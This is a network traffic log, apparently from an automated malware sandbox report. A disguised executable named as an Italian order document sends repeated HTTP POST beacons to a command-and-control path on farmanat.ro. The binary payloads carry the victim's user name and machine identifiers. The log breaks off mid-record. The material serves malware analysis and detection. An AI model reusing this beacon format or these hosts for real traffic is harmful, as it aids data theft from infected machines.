Nov 25, 2021 10:54:15.506026030 CET	7317	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:54:14 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
725	192.168.11.20	50573	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:54:15.874761105 CET	7318	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:54:15.908380985 CET	7318	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:54:15.959254026 CET	7319	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:54:14 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
726	192.168.11.20	50574	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:54:16.294504881 CET	7319	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:54:16.328176022 CET	7320	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:54:16.395275116 CET	7320	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:54:15 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
727	192.168.11.20	50575	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:54:16.790297031 CET	7321	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:54:16.824731112 CET	7321	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:54:16.884361982 CET	7321	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:54:15 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
728	192.168.11.20	50576	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:54:17.290043116 CET	7322	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:54:17.323609114 CET	7322	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:54:17.375152111 CET	7323	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:54:16 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
729	192.168.11.20	50577	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:54:17.798372984 CET	7323	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:54:17.832739115 CET	7324	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:54:17.890273094 CET	7324	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:54:16 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
73	192.168.11.20	49909	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:48:47.107852936 CET	6410	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:48:47.141951084 CET	6410	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:48:47.196496010 CET	6411	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:48:46 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
730	192.168.11.20	50578	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:54:18.280836105 CET	7325	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:54:18.314085960 CET	7325	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:54:18.363445044 CET	7325	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:54:17 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
731	192.168.11.20	50579	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:54:18.732676029 CET	7326	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:54:18.765846968 CET	7326	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:54:18.817780018 CET	7327	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:54:17 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
732	192.168.11.20	50580	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:54:19.228581905 CET	7327	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:54:19.262856007 CET	7328	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:54:19.315669060 CET	7328	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:54:18 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
733	192.168.11.20	50581	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:54:19.734999895 CET	7329	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:54:19.768616915 CET	7329	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:54:19.819405079 CET	7329	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:54:18 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
734	192.168.11.20	50582	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:54:20.196223974 CET	7330	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:54:20.230559111 CET	7330	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:54:20.289083004 CET	7331	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:54:19 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
735	192.168.11.20	50583	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:54:20.692030907 CET	7331	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:54:20.725589037 CET	7332	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:54:20.783749104 CET	7332	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:54:19 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
736	192.168.11.20	50584	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:54:21.190323114 CET	7333	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:54:21.223855972 CET	7333	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:54:21.293025017 CET	7333	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:54:20 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
737	192.168.11.20	50585	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:54:21.687268019 CET	7334	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:54:21.721350908 CET	7334	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:54:21.770921946 CET	7335	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:54:20 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
738	192.168.11.20	50586	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:54:22.210906029 CET	7335	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:54:22.244421959 CET	7336	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:54:22.301152945 CET	7336	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:54:21 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
739	192.168.11.20	50587	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:54:22.705040932 CET	7337	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:54:22.739272118 CET	7337	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:54:22.796283007 CET	7337	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:54:21 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
74	192.168.11.20	49911	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:48:47.685832024 CET	6418	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:48:47.719325066 CET	6418	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:48:47.774413109 CET	6419	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:48:46 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
740	192.168.11.20	50588	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:54:23.229444981 CET	7338	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:54:23.263679028 CET	7338	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:54:23.315236092 CET	7339	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:54:22 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
741	192.168.11.20	50589	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:54:23.722718000 CET	7339	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:54:23.756190062 CET	7340	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:54:23.806195021 CET	7340	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:54:22 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
742	192.168.11.20	50590	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:54:24.176004887 CET	7341	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:54:24.210030079 CET	7341	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:54:24.267311096 CET	7341	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:54:23 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
743	192.168.11.20	50591	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
